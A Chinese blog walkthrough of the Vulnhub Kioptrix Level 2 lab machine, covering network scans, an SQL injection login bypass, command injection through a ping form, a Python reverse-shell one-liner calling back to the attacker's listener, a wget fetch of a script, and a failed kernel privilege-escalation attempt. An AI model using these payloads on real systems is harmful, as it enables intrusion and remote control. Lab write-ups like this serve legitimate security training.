Vulnhub之Kioptrix Level 2靶机详细测试过程

Kioptrix Level 2



名称:Kioptrix: Level 1.1 (#2)



└─# netdiscover -i eth1  
Currently scanning:   |   Screen View: Unique Hosts                                                                     
 12 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 720                                                                        
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------   00:50:56:c0:00:01      3     180  VMware, Inc.                                                                   00:0c:29:8a:42:50      2     120  VMware, Inc.                                                                   00:50:56:fe:ae:b9      4     240  VMware, Inc.                                                                         

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.187.132


└─# nmap -sS -sV -sC -p- -oN nmap_full_scan                                                                         130 ⨯
Starting Nmap 7.92 ( ) at 2022-12-04 21:53 EST
Nmap scan report for bogon (
Host is up (0.00097s latency).
Not shown: 65528 closed tcp ports (reset)
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            627/udp   status
|_  100024  1            630/tcp   status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2022-12-05T00:21:11+00:00; -2h32m55s from scanner time.
630/tcp  open  status   1 (RPC #100024)
631/tcp  open  ipp      CUPS 1.1
|_http-title: 403 Forbidden
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
3306/tcp open  mysql    MySQL (unauthorized)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:8A:42:50 (VMware)

Host script results:
|_clock-skew: -2h32m55s

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 55.48 seconds


访问80端口,返回登录页面,发现很容易就Login bypass,

Username: admin' or 1=1 --

Password: 随便


输入框构造:;which python

返回: /usr/bin/python



python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

在Kali Linux上成功得到反弹回来的shell:

└─# nc -nlvp 5555                                          
listening on [any] 5555 ...
connect to [] from (UNKNOWN) [] 32769
sh-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-3.00$ pwd
sh-3.00$ ls -alh
ls -alh
total 24K
drwxr-xr-x  2 root root 4.0K Oct  8  2009 .
drwxr-xr-x  8 root root 4.0K Oct  7  2009 ..
-rwxr-Sr-t  1 root root 1.7K Feb  9  2012 index.php
-rwxr-Sr-t  1 root root  199 Oct  8  2009 pingit.php



sh-3.00$ cd /tmp
cd /tmp
sh-3.00$ wget
           => `'
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 765,824 (748K) [text/x-sh]

100%[====================================>] 765,824       --.--K/s             

19:41:39 (26.65 MB/s) - `' saved [765824/765824]

sh-3.00$ chmod +x
chmod +x
sh-3.00$ ./



sh-3.00$ uname -a
uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

└─# searchsploit kernel 2.6.9 
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                             |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Android Kernel < 4.8 - ptrace seccomp Filter Bypass                                                                                                        | android/dos/46434.c
Apple iOS < 10.3.1 - Kernel                                                                                                                                | ios/local/42555.txt
Apple Mac OSX < 10.6.7 - Kernel Panic (Denial of Service)                                                                                                  | osx/dos/17901.c
Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free                                 | macos/local/40956.c
Apple macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation                      | macos/local/40957.c
Apple macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free                       | multiple/dos/40955.txt
DESlock+ < 3.2.6 - ''s Local kernel Ring0 SYSTEM                                                                                                | windows/local/5144.c
DESlock+ < 3.2.6 - 'DLMFENC.sys' Local Kernel Ring0 link list zero (PoC)                                                                                   | windows/dos/5142.c
DESlock+ < 3.2.6 - 'LIST' Local Kernel Memory Leak                                                                                                         | windows/local/5141.c
DESlock+ < 3.2.6 - Local Kernel Ring0 link list zero SYSTEM                                                                                                | windows/local/5143.c
DESlock+ < 3.2.7 - 'probe read' Local Kernel Denial of Service (PoC)                                                                                       | windows/dos/6498.c
DESlock+ < 3.2.7 - Local Kernel Overflow (PoC)                                                                                                             | windows/dos/6496.c
DESlock+ < 3.2.7 - Local Kernel Race Condition Denial of Service (PoC)                                                                                     | windows/dos/6497.c
DESlock+ < 4.1.10 - 'vdlptokn.sys' Local Kernel Ring0 SYSTEM                                                                                               | windows/local/16138.c
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation                                                                    | windows/local/
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (1)                                                              | windows/local/
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (2)                                                              | windows/local/
Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation                                                                                  | solaris/local/15962.c
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Local Privilege Escalation (3)                                                                 | linux/local/
Linux Kernel 2.4.22-28/2.6.9 - 'igmp.c' Local Denial of Service                                                                                            | linux/dos/686.c
Linux Kernel 2.4.28/2.6.9 - 'ip_options_get' Local Overflow                                                                                                | linux/dos/692.c
Linux Kernel 2.4.28/2.6.9 - 'scm_send Local' Denial of Service                                                                                             | linux/dos/685.c
Linux Kernel 2.4.28/2.6.9 - Memory Leak Local Denial of Service                                                                                            | linux/dos/691.c
Linux Kernel 2.4.28/2.6.9 - vc_resize int Local Overflow                                                                                                   | linux/dos/690.c
Linux Kernel 2.4.4 < / 2.6.0 < - 'Sendpage' Local Privilege Escalation (Metasploit)                                                      | linux/local/19933.rb
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)                       | linux_x86/local/9542.c
Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1)                                                                                      | linux/local/33321.c
Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation                                                | linux/local/1397.c
Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)                                                                       | linux/dos/31965.c
Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)                                                                       | linux/dos/31966.c
Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation                                                             | linux_x86-64/local/33516.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                                                                                       | linux/dos/43234.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation                                                                                                 | linux/local/41886.c
Linux Kernel < - BlueTooth Stack Privilege Escalation                                                                                             | linux/local/4756.c
Linux Kernel < - 'procfs' Kernel Memory Disclosure                                                                                                | linux/local/9363.c
Linux Kernel < - Netfilter NAT SNMP Module Remote Denial of Service                                                                              | linux/dos/1880.c
Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Local Privilege Escalation (3)                                                                            | linux/local/9575.c
Linux Kernel < 2.6.19 (x86/x64) - 'udp_sendmsg' Local Privilege Escalation (2)                                                                             | linux/local/9574.txt
Linux Kernel < - 'IPv6_Getsockopt_Sticky' Memory Leak                                                                                             | linux/local/4172.c
Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation                                                                                  | linux/local/6851.c
Linux Kernel < - SCTP Kernel Memory Disclosure                                                                                                    | linux/local/7618.c
Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation                                                                                       | linux/local/33523.c
Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation                                                                                         | linux/local/
Linux Kernel < - 'cfg80211' Remote Denial of Service                                                                                              | linux/dos/9442.c
Linux Kernel < 2.6.31-rc4 - 'nfs4_proc_lock()' Denial of Service                                                                                           | linux/dos/10202.c
Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2)                                                                                         | linux/local/9543.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation (1)                                                                  | linux_x86/local/15916.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation (2)                                                              | linux/local/15944.c
Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation                                                                   | linux/local/14814.c
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation                                                                     | linux_x86-64/local/15023.c
Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure                                                                     | linux/local/15150.c
Linux Kernel < (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation                                                                       | linux/local/17787.c
Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation                                                                                | linux/local/15774.c
Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2)                                                                              | linux/dos/16952.c
Linux Kernel < 3.16.1 - 'Remount FUSE' Local Privilege Escalation                                                                                          | linux/local/34923.c
Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation                                                                               | linux_x86-64/local/44302.c
Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Privilege Escalation                                                                    | linux_x86-64/local/34134.c
Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Local Privilege Escalation                                                                                  | arm/local/31574.c
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation                                                          | linux_x86-64/local/44299.c
Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Local Privilege Escalation (2)                                                                         | linux_x86-64/local/26131.c
Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Local Privilege Escalation                                                                 | linux/local/25450.c
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service                                                                               | linux/dos/42136.c
Linux kernel < 4.10.15 - Race Condition Privilege Escalation                                                                                               | linux/local/43345.c
Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation                                                                          | linux/local/45553.c
Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC)                                                                                                    | linux/dos/42762.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                                                              | linux/local/45010.c
Linux Kernel < 4.14.rc3 - Local Denial of Service                                                                                                          | linux/dos/42932.c
Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak                                                                                                   | linux/local/44325.c
Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption                                                                                       | linux/dos/44832.txt
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free                                                                                                             | linux/dos/44579.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                                                                                     | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation                                                          | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)                                                      | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP)                                  | linux/local/47169.c
Linux Kernel < 4.5.1 - Off-By-One (PoC)                                                                                                                    | linux/dos/44301.c
macOS < 10.14.3 / iOS < 12.1.3 - Kernel Heap Overflow in PF_KEY due to Lack of Bounds Checking when Retrieving Statistics                                  | multiple/dos/46300.c
OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow                                                                                  | bsd/local/125.c
Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Privilege Escalation (PoC)                                         | hardware/local/48644.c
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

└─# searchsploit -m linux_x86/local/9542.c
  Exploit: Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
     Path: /usr/share/exploitdb/exploits/linux_x86/local/9542.c
File Type: C source, ASCII text

Copied to: /root/Vulnhub/Kioprtix2/9542.c



sh-3.00$ gcc -o exploit 9542.c
gcc -o exploit 9542.c
9542.c:109:28: warning: no newline at end of file
sh-3.00$ gcc -o exploit 9542.c
gcc -o exploit 9542.c
sh-3.00$ chmod +x exploit
chmod +x exploit
sh-3.00$ ./exploit
[-] exploit failed, try again


posted @ 2022-12-05 11:41  Jason_huawen  阅读(378)  评论(0编辑  收藏  举报